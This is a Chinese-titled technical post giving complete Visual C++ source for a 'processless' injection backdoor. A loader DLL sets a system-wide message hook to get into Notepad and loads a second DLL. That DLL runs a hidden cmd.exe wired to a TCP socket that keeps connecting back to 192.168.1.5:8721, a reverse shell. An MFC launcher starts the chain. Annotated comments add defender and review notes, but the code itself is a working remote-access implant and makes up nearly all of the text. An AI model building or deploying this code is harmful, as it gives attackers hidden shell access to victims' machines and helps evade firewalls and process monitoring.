vc++无进程式线程插入穿墙技术实现

加载模块核心源码

#include "Loader.h"

// Entry point of the loader DLL.
// Every notification stores the module handle in the global `hinst`; SetHook
// later passes that handle to SetWindowsHookEx as the module that contains the
// hook procedure. No attach/detach work happens here: the hook is installed
// and removed only through the SetHook and UnHook functions.
BOOL WINAPI DllMain(
  HINSTANCE hinstDLL,
  DWORD fdwReason,
  LPVOID lpvReserved
)
{
 // All notification reasons are treated alike: remember the handle, report success.
 hinst = hinstDLL;
 return TRUE;
}

// Installs a WH_GETMESSAGE hook whose procedure (GetMsgProc) lives in this DLL.
//
// hWnd is the caller's window handle. It is stored in the global m_hWnd and
// later handed to the second-stage DLL's "Run" function by GetMsgProc.
//
// Security note: the last argument of SetWindowsHookEx is the thread id, and 0
// asks for a hook on all threads of the current desktop. Windows then maps this
// DLL into other processes as they retrieve messages, so this single call is
// the injection step of the whole sample. A SetWindowsHookEx call that passes a
// DLL module handle together with thread id 0, made by an unsigned or
// unexpected binary, is a common detection point for endpoint monitoring.
void SetHook(HWND hWnd)
{
 // hHook, m_hWnd and hinst are declared outside this listing.
 hHook = NULL;
 m_hWnd = hWnd;

 hHook = SetWindowsHookEx(WH_GETMESSAGE,GetMsgProc,hinst,0);
 if (hHook == 0)
 {
  // Failure is reported only through a message box; the caller gets no status.
  MessageBox(NULL,"Hook Unsuccess!","Warning",MB_OK|MB_ICONWARNING);
 }
}

// Removes the message hook stored in the global hHook and shows a warning box
// when UnhookWindowsHookEx does not report TRUE.
void UnHook()
{
 const BOOL removed = UnhookWindowsHookEx(hHook);
 if (removed == TRUE)
  return;

 MessageBox(NULL,"UnHook Unsuccess!","Warning",MB_OK|MB_ICONWARNING);
}

// WH_GETMESSAGE hook procedure. It executes inside whichever process this DLL
// has been mapped into, each time that process retrieves a message.
//
// Behaviour: upper-cases the host executable's path and, the first time that
// path contains "NOTEPAD.EXE", loads a second-stage DLL from a hard-coded path
// and calls its "Run" function with the window handle saved by SetHook.
//
// Defender notes:
//  - The observable artefact is a module load of Insert.dll, from a build
//    output directory, into a process whose image name contains notepad.exe.
//  - The name test is a substring match on the full path, so any path that
//    contains that text matches, not only the real Notepad binary.
//
// NOTE(review): the CallNextHookEx result is discarded and 1 is always
// returned; the trailing `return TRUE;` is unreachable.
// NOTE(review): both _strdup buffers are never freed, so memory is lost on
// every message, and Run is invoked even when LoadLibrary or GetProcAddress
// returned NULL. Either problem destabilises the host process, and unexplained
// crashes or memory growth in GUI processes are worth triaging for this reason.
LRESULT CALLBACK GetMsgProc(int code,WPARAM wParam,LPARAM lParam)
{
 CallNextHookEx(hHook,code,wParam,lParam);

 // One-shot latch per copy of this DLL: the second stage is loaded at most once.
 static bool old = false;
 char buffer[1000];
 memset(buffer,0,1000);
 // Module handle 0 means "the executable of the current process".
 GetModuleFileName(0,buffer,1000);

 // Upper-case copies so the substring comparison below ignores case.
 char *InsertName = _strupr(_strdup("notepad.exe"));
 char *CurrentName = _strupr(_strdup(buffer));

 if (strstr(CurrentName,InsertName) != NULL && old == false)
 {
  old = true;
  HMODULE hDll = NULL;
  // Absolute path into the author's build tree; the sample only works on that machine layout.
  hDll = LoadLibrary("E:\\Microsoft Visual Studio\\系统工程\\线程插入技术\\三级跳技术\\Insert\\Debug\\Insert.dll");
  if (hDll == NULL)
  {
   MessageBox(NULL,"Insert failed!","",MB_OK|MB_ICONERROR);
  }
  // Execution continues to the lookup and call below even after a failed load.
  typedef void (*RUN)(HWND);
  RUN Run = (RUN)GetProcAddress(hDll,"Run");
  Run(m_hWnd);
 }

 return 1;

 return TRUE;
}

插入模块核心源码

#include "Insert.h"

// Entry point of the second-stage (Insert) DLL.
// Nothing is done on attach; the worker thread is started by the Run function.
// On process detach the worker thread is forcibly terminated.
//
// NOTE(review): `ret` and `hThread` are declared outside this listing.
// TerminateThread stops the thread without running any of its cleanup, so the
// socket and process handles owned by ThreadProc are simply abandoned.
BOOL WINAPI DllMain(
  HINSTANCE hinstDLL,
  DWORD fdwReason,
  LPVOID lpvReserved
)
{
 switch(fdwReason)
 {
 case DLL_PROCESS_ATTACH:
  break;
 case DLL_THREAD_ATTACH:
  break;
 case DLL_THREAD_DETACH:
  break;
 case DLL_PROCESS_DETACH:
  // Kill the worker thread created by Run; a zero result means the call failed.
  ret = FALSE;
  ret = TerminateThread(hThread,0);
  if (ret == 0)
   MessageBox(NULL,"Terminate Work Thread Failed!","Failed",MB_OK|MB_ICONERROR);
  break;
 default:
  break;
 }
 return TRUE;
}

// Second-stage entry function, called by the loader's hook procedure from
// inside the host process.
//
// hWnd is the launcher dialog's window handle (stored by SetHook and forwarded
// by GetMsgProc). WM_CLOSE is sent to it first, so the launcher closes, and
// then a worker thread is started in the host process.
//
// Defender note: this is the "no process of its own" behaviour named in the
// page title. Once the launcher has closed, nothing new appears in a process
// list; the activity shows up as an extra thread, an unexpected loaded module
// and network connections belonging to the host process.
void Run(HWND hWnd)
{
 hThread = NULL;
 // SendMessage is synchronous: the launcher's close handling runs before the thread starts.
 ::SendMessage(hWnd,WM_CLOSE,0,0);
 hThread = CreateThread(NULL,0,ThreadProc,NULL,0,NULL);
 if (hThread == 0)
  MessageBox(NULL,"Create Work Thread Failed!","Failed",MB_OK|MB_ICONERROR);
}

// Worker thread started by Run. lpParameter is not used.
//
// Behaviour: repeatedly opens a TCP connection to 192.168.1.5 port 8721
// (retrying every 5000 ms), then starts cmd.exe with a hidden window and with
// stdin, stdout and stderr all set to the connected socket. It waits for that
// cmd.exe to exit, closes the socket and starts over.
//
// Defender notes, all visible from outside the process:
//  - an outbound TCP connection from a process that normally has no network
//    activity, with a fixed retry interval while the peer is unreachable;
//  - cmd.exe created as a child of the host process with a hidden window;
//  - a child process whose standard handles are sockets instead of a console,
//    a pipe or a file.
//
// NOTE(review): the results of WSAStartup, WSASocket and CreateProcess are
// not checked. The socket created before the loop is overwritten without being
// closed, failed connection attempts only call shutdown (never closesocket),
// and the handles in `pi` are never closed, so the host process steadily
// accumulates handles. WSACleanup and the final return are unreachable because
// the outer loop has no exit.
DWORD WINAPI ThreadProc(
  LPVOID lpParameter
)
{
 WSADATA wsa;
 WSAStartup(MAKEWORD(2,0),&wsa);

 SOCKET sock;
 PROCESS_INFORMATION pi;
 STARTUPINFO si;
 sockaddr_in addr;

 memset(&addr,0,sizeof(addr));
 memset(&pi,0,sizeof(pi));
 memset(&si,0,sizeof(si));

 // Hard-coded remote endpoint.
 addr.sin_family = AF_INET;
 addr.sin_port = htons(8721);
 addr.sin_addr.S_un.S_addr = inet_addr("192.168.1.5");

 // This first socket is replaced at the top of the loop and never used.
 sock = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);

 while(1)
 { 
  sock = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
  // Retry the same socket every five seconds until connect succeeds.
  while (0 != connect(sock,(sockaddr*)&addr,sizeof(addr)))
  {
  // MessageBox(0,"Connect failed!","Report",MB_OK|MB_ICONERROR);
   shutdown(sock,0);
   Sleep(5000);
  }
  // Redirect all three standard handles of the child to the socket and hide its window.
  si.cb = sizeof(si);
  si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
  si.hStdInput = si.hStdError = si.hStdOutput = (void*)sock;
  si.wShowWindow = SW_HIDE;
  memset(&pi,0,sizeof(pi));
  // Fifth argument `true` lets the child inherit handles, which is how it receives the socket.
  BOOL ret = CreateProcess(NULL,"cmd.exe",NULL,NULL,true,0,NULL,NULL,&si,&pi);
  // Block until the child exits, then drop the connection and loop again.
  WaitForSingleObject(pi.hProcess,INFINITE);   
  closesocket(sock);
 }
 WSACleanup();
 return 1;
}

执行源码

// WinExeDlg.cpp : implementation file
//

#include "stdafx.h"
#include "WinExe.h"
#include "WinExeDlg.h"

// Debug builds only: redefine `new` as DEBUG_NEW and give this translation
// unit its own THIS_FILE string holding the source file name.
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif

/////////////////////////////////////////////////////////////////////////////
// CAboutDlg dialog used for App About

// "About" dialog of the launcher application. It carries no data members and
// no message handlers of its own; the //{{AFX_...}} markers are ClassWizard
// regions and must stay as they are for the wizard to keep working.
class CAboutDlg : public CDialog
{
public:
 CAboutDlg();

// Dialog Data
 //{{AFX_DATA(CAboutDlg)
 enum { IDD = IDD_ABOUTBOX };   // dialog template resource id
 //}}AFX_DATA

 // ClassWizard generated virtual function overrides
 //{{AFX_VIRTUAL(CAboutDlg)
 protected:
 virtual void DoDataExchange(CDataExchange* pDX);    // DDX/DDV support
 //}}AFX_VIRTUAL

// Implementation
protected:
 //{{AFX_MSG(CAboutDlg)
 //}}AFX_MSG
 DECLARE_MESSAGE_MAP()
};

// Constructs the About dialog from its template id; there are no members to initialise.
CAboutDlg::CAboutDlg() : CDialog(CAboutDlg::IDD)
{
 //{{AFX_DATA_INIT(CAboutDlg)
 //}}AFX_DATA_INIT
}

// Data exchange for the About dialog: forwards to the base class only, since
// the dialog has no bound controls.
void CAboutDlg::DoDataExchange(CDataExchange* pDX)
{
 CDialog::DoDataExchange(pDX);
 //{{AFX_DATA_MAP(CAboutDlg)
 //}}AFX_DATA_MAP
}

// Message map of the About dialog; it is empty, so all messages go to CDialog.
BEGIN_MESSAGE_MAP(CAboutDlg, CDialog)
 //{{AFX_MSG_MAP(CAboutDlg)
  // No message handlers
 //}}AFX_MSG_MAP
END_MESSAGE_MAP()

/////////////////////////////////////////////////////////////////////////////
// CWinExeDlg dialog

// Constructs the launcher's main dialog.
// pParent is the optional parent window. The loader DLL handle starts out as
// NULL (it is filled in by OnInitDialog) and the application icon is loaded.
CWinExeDlg::CWinExeDlg(CWnd* pParent /*=NULL*/)
 : CDialog(CWinExeDlg::IDD, pParent)
{
 //{{AFX_DATA_INIT(CWinExeDlg)
  // NOTE: the ClassWizard will add member initialization here
 //}}AFX_DATA_INIT
 
 // No loader DLL is loaded yet.
 h_Dll = NULL;

 m_hIcon = AfxGetApp()->LoadIcon(IDR_MAINFRAME);
}

// Data exchange for the main dialog: forwards to the base class only, since no
// DDX/DDV bindings have been added.
void CWinExeDlg::DoDataExchange(CDataExchange* pDX)
{
 CDialog::DoDataExchange(pDX);
 //{{AFX_DATA_MAP(CWinExeDlg)
  // NOTE: the ClassWizard will add DDX and DDV calls here
 //}}AFX_DATA_MAP
}

// Message map of the main dialog. Besides the standard system-command, paint
// and drag-icon handlers, it routes the IDC_BTN_LOADER button to OnBtnLoader
// (which installs the hook) and WM_CLOSE to OnClose (which removes it).
BEGIN_MESSAGE_MAP(CWinExeDlg, CDialog)
 //{{AFX_MSG_MAP(CWinExeDlg)
 ON_WM_SYSCOMMAND()
 ON_WM_PAINT()
 ON_WM_QUERYDRAGICON()
 ON_BN_CLICKED(IDC_BTN_LOADER, OnBtnLoader)
 ON_WM_CLOSE()
 //}}AFX_MSG_MAP
END_MESSAGE_MAP()

/////////////////////////////////////////////////////////////////////////////
// CWinExeDlg message handlers

// Initialises the main dialog: adds the "About..." entry to the system menu,
// sets the big and small icons, and loads the loader DLL into this process.
// Returns TRUE when the DLL was loaded; after a failed load it shows an error
// box and returns false.
//
// The DLL path is relative, so it is resolved against the process's current
// directory at run time rather than against the location of the executable.
BOOL CWinExeDlg::OnInitDialog()
{
 CDialog::OnInitDialog();

 // The About command id has to lie inside the system-command range.
 ASSERT((IDM_ABOUTBOX & 0xFFF0) == IDM_ABOUTBOX);
 ASSERT(IDM_ABOUTBOX < 0xF000);

 // Append the About entry only when both the menu and its caption are available.
 CMenu* const sysMenu = GetSystemMenu(FALSE);
 CString aboutCaption;
 if (sysMenu != NULL)
  aboutCaption.LoadString(IDS_ABOUTBOX);
 if (sysMenu != NULL && !aboutCaption.IsEmpty())
 {
  sysMenu->AppendMenu(MF_SEPARATOR);
  sysMenu->AppendMenu(MF_STRING, IDM_ABOUTBOX, aboutCaption);
 }

 // A dialog-based application has to set its own icons.
 SetIcon(m_hIcon, TRUE);   // big icon
 SetIcon(m_hIcon, FALSE);  // small icon

 // Keep the loader DLL handle for the button and close handlers.
 h_Dll = LoadLibrary("./../Loader/Debug/Loader.dll");
 if (h_Dll != 0)
  return TRUE;  // TRUE: focus was not set to a control here

 MessageBox("Load Library Error");
 return false;
}

// System-command handler: shows the About dialog for IDM_ABOUTBOX and passes
// every other command to the base class.
void CWinExeDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
 // The low four bits of a system command id are masked off before comparing.
 const bool isAboutCommand = (nID & 0xFFF0) == IDM_ABOUTBOX;
 if (!isAboutCommand)
 {
  CDialog::OnSysCommand(nID, lParam);
  return;
 }

 CAboutDlg aboutBox;
 aboutBox.DoModal();
}

// If you add a minimize button to your dialog, you will need the code below
//  to draw the icon.  For MFC applications using the document/view model,
//  this is automatically done for you by the framework.

// Paint handler: while the dialog is minimised it draws the application icon
// centred in the client area; otherwise painting is left to the base class.
void CWinExeDlg::OnPaint()
{
 if (!IsIconic())
 {
  CDialog::OnPaint();
  return;
 }

 CPaintDC paintDc(this); // device context for painting

 SendMessage(WM_ICONERASEBKGND, (WPARAM) paintDc.GetSafeHdc(), 0);

 // Work out the top-left corner that centres the icon in the client rectangle.
 CRect client;
 GetClientRect(&client);
 const int iconWidth = GetSystemMetrics(SM_CXICON);
 const int iconHeight = GetSystemMetrics(SM_CYICON);
 const int left = (client.Width() - iconWidth + 1) / 2;
 const int top = (client.Height() - iconHeight + 1) / 2;

 paintDc.DrawIcon(left, top, m_hIcon);
}

// The system calls this to obtain the cursor to display while the user drags
//  the minimized window.
// Returns the dialog icon as the cursor shown while the minimised window is dragged.
HCURSOR CWinExeDlg::OnQueryDragIcon()
{
 HCURSOR dragCursor = (HCURSOR) m_hIcon;
 return dragCursor;
}

// Button handler that triggers the hook installation.
// Looks up "SetHook" in the loader DLL loaded by OnInitDialog and calls it with
// this dialog's window handle; shows an error box and returns when the lookup fails.
//
// Defender note: from the launcher's point of view the only visible actions
// are a LoadLibrary of Loader.dll and this call; the system-wide hook itself is
// registered inside SetHook.
void CWinExeDlg::OnBtnLoader() 
{
// ShellExecute(0,"open","about:blank",NULL,NULL,SW_HIDE);
// WinExec("C:\\Program Files\\Internet Explorer\\iexplore.exe about:blank",SW_HIDE);

 // The function is resolved by name at run time rather than through an import library.
 typedef void (*LOAD)(HWND);
 LOAD Proc = (LOAD)GetProcAddress(h_Dll,"SetHook");
 if (Proc == 0)
 {
  MessageBox("Get Proc failed");
  return;
 }
 // m_hWnd is what the second stage later sends WM_CLOSE to.
 Proc(m_hWnd);

}

// WM_CLOSE handler: removes the hook through the loader DLL's "UnHook"
// function, unloads the DLL and then lets the base class close the dialog.
//
// NOTE(review): when "UnHook" cannot be resolved the handler returns before
// CDialog::OnClose, so the dialog does not close and the DLL stays loaded.
void CWinExeDlg::OnClose() 
{
 typedef void (*UNLOAD)(void);
 UNLOAD Proc = (UNLOAD)GetProcAddress(h_Dll,"UnHook");
 if (Proc == 0)
 {
  MessageBox("Get Proc failed");
  return;
 }
 Proc();
 
 // Release the launcher's reference to the loader DLL before closing.
 FreeLibrary(h_Dll);
 CDialog::OnClose();
}